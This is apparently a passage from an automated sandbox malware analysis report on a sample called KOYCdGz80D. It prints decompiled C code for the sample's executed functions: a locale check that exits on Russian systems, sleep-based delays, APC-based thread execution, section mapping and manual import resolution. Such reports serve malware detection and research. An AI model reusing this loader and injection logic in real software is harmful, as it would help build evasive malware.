5046->5052 5049 401183 memset 5049->5050 5050->5025 5051->5022 5053 40117d 5052->5053 5053->5049 5053->5050

                              Executed Functions

                              Function 004019F1 Relevance: 27.2, APIs: 18, Instructions: 160threadsleepnativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 85%
                              			E004019F1() {
				long _v8;
				char _v12;
				char _v16;
				void* _v40;
				long _t28;
				long _t31;
				signed short _t33;
				void* _t37;
				long _t40;
				long _t41;
				void* _t48;
				intOrPtr _t50;
				signed int _t57;
				signed int _t58;
				long _t63;
				long _t65;
				intOrPtr _t66;
				void* _t71;
				void* _t75;
				signed int _t77;
				signed int _t78;
				void* _t82;
				intOrPtr* _t83;

				_t28 = E00401D68();
				_v8 = _t28;
				if(_t28 != 0) {
					return _t28;
				}
				do {
					_t77 = 0;
					_v12 = 0;
					_t63 = 0x30;
					do {
						_t71 = E004012E6(_t63);
						if(_t71 == 0) {
							_v8 = 8;
						} else {
							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
							_t67 = _t57;
							_t58 = _t57 & 0x0000ffff;
							_v8 = _t58;
							if(_t58 == 4) {
								_t63 = _t63 + 0x30;
							}
							_t78 = 0x13;
							_t10 = _t67 + 1; // 0x1
							_t77 =  *_t71 % _t78 + _t10;
							E00401BA9(_t71);
						}
					} while (_v8 != 0);
					_v8 = E00401688(_t77);
					Sleep(_t77 << 4); // executed
					_t31 = _v8;
				} while (_t31 == 0x15);
				if(_t31 != 0) {
					L30:
					return _t31;
				}
				_v12 = 0;
				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
				if(_t33 == 0) {
					__imp__GetSystemDefaultUILanguage();
					_t67 =  &_v12;
					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
				}
				if(_v12 == 0x5552) {
					L28:
					_t31 = _v8;
					if(_t31 == 0xffffffff) {
						_t31 = GetLastError();
					}
					goto L30;
				} else {
					if(E00401800(_t67,  &_v16) != 0) {
						 *0x404178 = 0;
						L20:
						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
						_t82 = _t37;
						if(_t82 == 0) {
							L27:
							_v8 = GetLastError();
							goto L28;
						}
						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
						if(_t40 == 0) {
							_t65 = GetLastError();
							TerminateThread(_t82, _t65);
							CloseHandle(_t82);
							_t82 = 0;
							SetLastError(_t65);
						}
						if(_t82 == 0) {
							goto L27;
						} else {
							_t41 = WaitForSingleObject(_t82, 0xffffffff);
							_v8 = _t41;
							if(_t41 == 0) {
								GetExitCodeThread(_t82,  &_v8);
							}
							CloseHandle(_t82);
							goto L28;
						}
					}
					_t66 = _v16;
					_t83 = __imp__GetLongPathNameW;
					_t48 =  *_t83(_t66, 0, 0); // executed
					_t75 = _t48;
					if(_t75 == 0) {
						L18:
						 *0x404178 = _t66;
						goto L20;
					}
					_t22 = _t75 + 2; // 0x2
					_t50 = E004012E6(_t75 + _t22);
					 *0x404178 = _t50;
					if(_t50 == 0) {
						goto L18;
					}
					 *_t83(_t66, _t50, _t75); // executed
					E00401BA9(_t66);
					goto L20;
				}
			}


























                              0x004019f7
                              0x004019fc
                              0x00401a01
                              0x00401ba8
                              0x00401ba8
                              0x00401a0a
                              0x00401a0a
                              0x00401a0e
                              0x00401a11
                              0x00401a12
                              0x00401a18
                              0x00401a1c
                              0x00401a53
                              0x00401a1e
                              0x00401a26
                              0x00401a2c
                              0x00401a2e
                              0x00401a33
                              0x00401a39
                              0x00401a3b
                              0x00401a3b
                              0x00401a42
                              0x00401a48
                              0x00401a48
                              0x00401a4c
                              0x00401a4c
                              0x00401a5a
                              0x00401a6a
                              0x00401a6d
                              0x00401a73
                              0x00401a76
                              0x00401a7f
                              0x00401ba4
                              0x00000000
                              0x00401ba6
                              0x00401a92
                              0x00401a95
                              0x00401a9d
                              0x00401a9f
                              0x00401aaa
                              0x00401ab2
                              0x00401ab2
                              0x00401ac0
                              0x00401b96
                              0x00401b96
                              0x00401b9c
                              0x00401b9e
                              0x00401b9e
                              0x00000000
                              0x00401ac6
                              0x00401ad1
                              0x00401b0f
                              0x00401b15
                              0x00401b27
                              0x00401b2d
                              0x00401b31
                              0x00401b8d
                              0x00401b93
                              0x00000000
                              0x00401b93
                              0x00401b3d
                              0x00401b4b
                              0x00401b53
                              0x00401b57
                              0x00401b5e
                              0x00401b61
                              0x00401b63
                              0x00401b63
                              0x00401b6b
                              0x00000000
                              0x00401b6d
                              0x00401b70
                              0x00401b76
                              0x00401b7b
                              0x00401b82
                              0x00401b82
                              0x00401b89
                              0x00000000
                              0x00401b89
                              0x00401b6b
                              0x00401ad3
                              0x00401ad8
                              0x00401adf
                              0x00401ae1
                              0x00401ae5
                              0x00401b07
                              0x00401b07
                              0x00000000
                              0x00401b07
                              0x00401ae7
                              0x00401aec
                              0x00401af1
                              0x00401af8
                              0x00000000
                              0x00000000
                              0x00401afd
                              0x00401b00
                              0x00000000
                              0x00401b00

                              APIs
                                • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                                • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
                                • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
                                • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                                • Part of subcall function 004012E6: HeapAlloc.KERNEL32(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                              • NtQuerySystemInformation.NTDLL ref: 00401A26
                              • Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                              • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                              • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                              • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
                              • CreateThread.KERNEL32 ref: 00401B27
                              • QueueUserAPC.KERNEL32(0040139F,00000000,?,?,00000000), ref: 00401B3D
                              • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
                              • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
                              • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
                              • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
                              • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                              • String ID:
                              • API String ID: 520738550-0
                              • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                              • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
                              • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                              • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004015B0 Relevance: 10.6, APIs: 7, Instructions: 81filetimeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 69%
                              			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402026();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404184;
				_push(_t15 + 0x4051ca);
				_push(_t15 + 0x4051c0);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00402020();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                              0x004015b0
                              0x004015b9
                              0x004015bd
                              0x004015c3
                              0x004015c8
                              0x004015cd
                              0x004015d0
                              0x004015d3
                              0x004015d8
                              0x004015d9
                              0x004015dc
                              0x004015e7
                              0x004015ee
                              0x004015f2
                              0x004015f4
                              0x004015f5
                              0x004015f8
                              0x004015fd
                              0x00401607
                              0x00401609
                              0x00401609
                              0x0040161d
                              0x00401623
                              0x00401627
                              0x00401677
                              0x00401629
                              0x00401632
                              0x00401648
                              0x00401650
                              0x00401662
                              0x00401666
                              0x00000000
                              0x00000000
                              0x00401652
                              0x00401655
                              0x0040165a
                              0x0040165c
                              0x0040165c
                              0x0040163d
                              0x0040163f
                              0x00401668
                              0x00401669
                              0x00401669
                              0x00401632
                              0x0040167f

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
                              • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401648
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
                              • String ID:
                              • API String ID: 3812556954-0
                              • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                              • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
                              • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                              • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040110B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 82 40110b-40116d NtCreateSection 83 4011a4-4011a8 82->83 84 40116f-401178 call 401459 82->84 90 4011aa-4011b0 83->90 86 40117d-401181 84->86 88 401183-40119a memset 86->88 89 40119c-4011a2 86->89 88->90 89->90
                              C-Code - Quality: 72%
                              			E0040110B(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401459(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                              0x00401114
                              0x0040111b
                              0x0040111c
                              0x0040111d
                              0x0040111e
                              0x0040111f
                              0x00401130
                              0x00401134
                              0x00401148
                              0x0040114b
                              0x0040114e
                              0x00401155
                              0x00401158
                              0x0040115f
                              0x00401162
                              0x00401165
                              0x00401168
                              0x0040116d
                              0x004011a8
                              0x0040116f
                              0x00401172
                              0x00401178
                              0x0040117d
                              0x00401181
                              0x0040119f
                              0x00401183
                              0x0040118a
                              0x00401198
                              0x00401198
                              0x00401181
                              0x004011b0

                              APIs
                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,77294EE0,00000000,00000000,?), ref: 00401168
                                • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                              • memset.NTDLL ref: 0040118A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID: @
                              • API String ID: 2533685722-2766056989
                              • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                              • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
                              • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                              • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401000 Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 201 401000-40101d 202 401103-401108 201->202 203 401023-40102d 201->203 203->202 204 401033 203->204 205 401034-401043 LoadLibraryA 204->205 206 4010f9-4010ff 205->206 207 401049-40105f 205->207 210 401102 206->210 208 401061-401065 207->208 209 401067-40106f 207->209 208->209 211 4010e5-4010f1 208->211 212 4010d4-4010d8 209->212 210->202 211->205 215 4010f7 211->215 213 401071 212->213 214 4010da 212->214 216 401073-401075 213->216 217 401077-401079 213->217 214->211 215->210 218 401087-40108a 216->218 219 40107b-401085 217->219 220 40108c-401093 217->220 221 401096-40109b 218->221 219->218 219->220 220->221 222 4010a2 221->222 223 40109d-4010a0 221->223 224 4010a6-4010b2 GetProcAddress 222->224 223->224 225 4010b4-4010b9 224->225 226 4010dc-4010e2 224->226 227 4010c3-4010d1 225->227 228 4010bb-4010c1 225->228 226->211 227->212 228->227
                              C-Code - Quality: 100%
                              			E00401000(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x404180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x43175ac3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x43175a44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x43175ac3;
										}
										 *_v16 = _t55;
										_t58 = _t59 * 4 - 0xc5d6b08;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0xbce8a5bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                              0x00401000
                              0x00401009
                              0x0040100e
                              0x00401014
                              0x0040101d
                              0x00401023
                              0x00401025
                              0x00401028
                              0x0040102d
                              0x00401034
                              0x00401034
                              0x00401038
                              0x0040103e
                              0x00401043
                              0x00000000
                              0x00000000
                              0x00401049
                              0x00401053
                              0x00401055
                              0x00401058
                              0x0040105b
                              0x0040105f
                              0x00401067
                              0x00401069
                              0x0040106c
                              0x004010d4
                              0x004010d4
                              0x004010d8
                              0x00000000
                              0x00000000
                              0x00401071
                              0x00401077
                              0x00401079
                              0x0040108c
                              0x0040108f
                              0x0040108f
                              0x0040108f
                              0x00401093
                              0x0040107b
                              0x0040107b
                              0x00401083
                              0x00401085
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401085
                              0x00401073
                              0x00401073
                              0x00401087
                              0x00401087
                              0x00401087
                              0x00401096
                              0x00401099
                              0x0040109b
                              0x004010a2
                              0x0040109d
                              0x0040109d
                              0x0040109d
                              0x004010aa
                              0x004010b0
                              0x004010b2
                              0x004010e2
                              0x004010b4
                              0x004010b4
                              0x004010b7
                              0x004010b9
                              0x004010c1
                              0x004010c1
                              0x004010c6
                              0x004010c8
                              0x004010cf
                              0x004010d1
                              0x004010d1
                              0x004010d1
                              0x00000000
                              0x004010d1
                              0x00000000
                              0x004010b2
                              0x00401061
                              0x00401061
                              0x00401065
                              0x00000000
                              0x00000000
                              0x00401065
                              0x004010e5
                              0x004010e5
                              0x004010ec
                              0x004010f1
                              0x00000000
                              0x00000000
                              0x004010f7
                              0x00401102
                              0x00000000
                              0x00401102
                              0x004010f9
                              0x004010f9
                              0x004010ff
                              0x00000000
                              0x004010ff
                              0x0040102d
                              0x00401103
                              0x00401108

                              APIs
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
                              • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID:
                              • API String ID: 2574300362-0
                              • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                              • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
                              • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                              • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 008256A5 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 250 8256a5-8256be 251 8256c0-8256c2 250->251 252 8256c4 251->252 253 8256c9-8256d5 CreateToolhelp32Snapshot 251->253 252->253 254 8256d7-8256dd 253->254 255 8256e5-8256f2 Module32First 253->255 254->255 260 8256df-8256e3 254->260 256 8256f4-8256f5 call 825364 255->256 257 8256fb-825703 255->257 261 8256fa 256->261 260->251 260->255 261->257
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008256CD
                              • Module32First.KERNEL32(00000000,00000224), ref: 008256ED
                              Memory Dump Source
                              • Source File: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_820000_KOYCdGz80D.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFirstModule32SnapshotToolhelp32
                              • String ID:
                              • API String ID: 3833638111-0
                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                              • Instruction ID: d898f8df674052b4f0fc3ea14dbb2df69223c0f1d46421f1f457991fa8364e49
                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                              • Instruction Fuzzy Hash: 62F0C231540B216BDB202AB9AC8CB6E73ECFF59725F900528E642D10C0CAB0EC854A65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401459 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 280 401459-40148b NtMapViewOfSection 281 401491 280->281 282 40148d-40148f 280->282 283 401495-401498 281->283 282->283
                              C-Code - Quality: 68%
                              			E00401459(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                              0x0040146b
                              0x00401471
                              0x0040147f
                              0x00401486
                              0x0040148b
                              0x00401491
                              0x00000000
                              0x00401492
                              0x00000000

                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
                              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401202 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 100%
                              			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E004012E6(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401BA9(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E0040110B(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                              0x00401210
                              0x00401214
                              0x004012d5
                              0x0040121a
                              0x00401232
                              0x00401241
                              0x00401248
                              0x0040124a
                              0x0040124f
                              0x004012cd
                              0x004012ce
                              0x00401251
                              0x0040125e
                              0x00401260
                              0x00401265
                              0x00000000
                              0x00401267
                              0x00401274
                              0x00401276
                              0x0040127b
                              0x00000000
                              0x0040127d
                              0x0040128a
                              0x0040128c
                              0x00401291
                              0x00000000
                              0x00401293
                              0x004012a0
                              0x004012a2
                              0x004012a7
                              0x00000000
